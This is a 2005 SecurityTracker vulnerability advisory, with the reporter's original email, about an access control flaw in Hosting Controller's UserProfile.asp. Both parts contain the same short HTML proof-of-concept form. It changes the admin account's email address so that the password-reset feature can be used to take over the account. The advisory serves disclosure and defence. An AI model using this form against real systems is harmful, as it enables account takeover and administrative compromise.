Hosting Controller 'UserProfile.asp' Lets Remote Authenticated Users Modify Other User Profiles
|
|
SecurityTracker Alert ID: 1014062
|
|
SecurityTracker URL: http://securitytracker.com/id?1014062
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 27 2005
|
Impact: Modification of user information, User access via network
|
Exploit Included: Yes
|
Version(s): 6.1 HotFix 2.0 and prior versions
|
Description: Soroush Dalili from GrayHatz Security Group reported a vulnerability in Hosting Controller. A remote authenticated user can change a target user's profile.
The 'UserProfile.asp' script does not properly enforce access controls. A remote authenticated user can change a target user's e-mail
address. Then, the remote authenticated user can invoke the 'forgot password' feature to request that a new password be sent to
the modified e-mail address. This can be exploited to gain administrative privileges.
A demonstration exploit form is provided:
<form
action="http://[URL]/admin//
accounts/UserProfile.asp?action=updateprofile"
method="post">
Username : <input name="UserList" value="hcadmin"
type="text" size="50">
<br>
emailaddress
: <input name="emailaddress"
value="Crkchat@msn.com" type="text" size="50">
<br>
firstname : <input name="firstname" value="Crkchat"
type="text"
size="50">
<br>
<input name="submit" value="submit" type="submit">
</form>
|
Impact: A remote authenticated user can change a target user's profile and then gain access to the target user's account.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.hostingcontroller.com/ (Links to External Site)
|
Cause: Access control error
|
Underlying OS: Windows (NT), Windows (2000), Windows (XP)
|
Reported By: s d <irsdl@yahoo.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 26 May 2005 17:59:36 -0700 (PDT)
From: s d <irsdl@yahoo.com>
Subject: By using "UserProfile.asp" at Hosting Controller: An authenticated user can change other's profiles
|
Hi, I'm Soroush Dalili from GSG (GrayHatz Security
Group).
Title: Hosting controller program have a security bug
in "UserProfile.asp" that an authenticated user can
change other's profiles.
Why is it dangerous: a user can change other's email
address and then use forgot password to recieve their
password! also he/she can gain administrator password
by this way!
Version: 6.1 HotFix 2.0 and older
Developer url: hostingcontroller.com
Comment: Hosting Controller is an application to
manage a host.
Exploit code to proof:
--------------------------------
Change users profiles:
<form
action="http://[URL]/admin//accounts/UserProfile.asp?action=updateprofile"
method="post">
Username : <input name="UserList" value="hcadmin"
type="text" size="50">
<br>
emailaddress : <input name="emailaddress"
value="Crkchat@msn.com" type="text" size="50">
<br>
firstname : <input name="firstname" value="Crkchat"
type="text" size="50">
<br>
<input name="submit" value="submit" type="submit">
</form>
-----------------------------------
Now u can use forgot password to gain passwords!
-----------------------------------
Finder name: Soroush Dalili
Email: Irsdl@yahoo.com
Team: GSG (GrayHatz Security Group)
Country: Iran
Thanks from Crkchat
__________________________________
Do you Yahoo!?
Yahoo! Small Business - Try our new Resources site
http://smallbusiness.yahoo.com/resources/
|
|
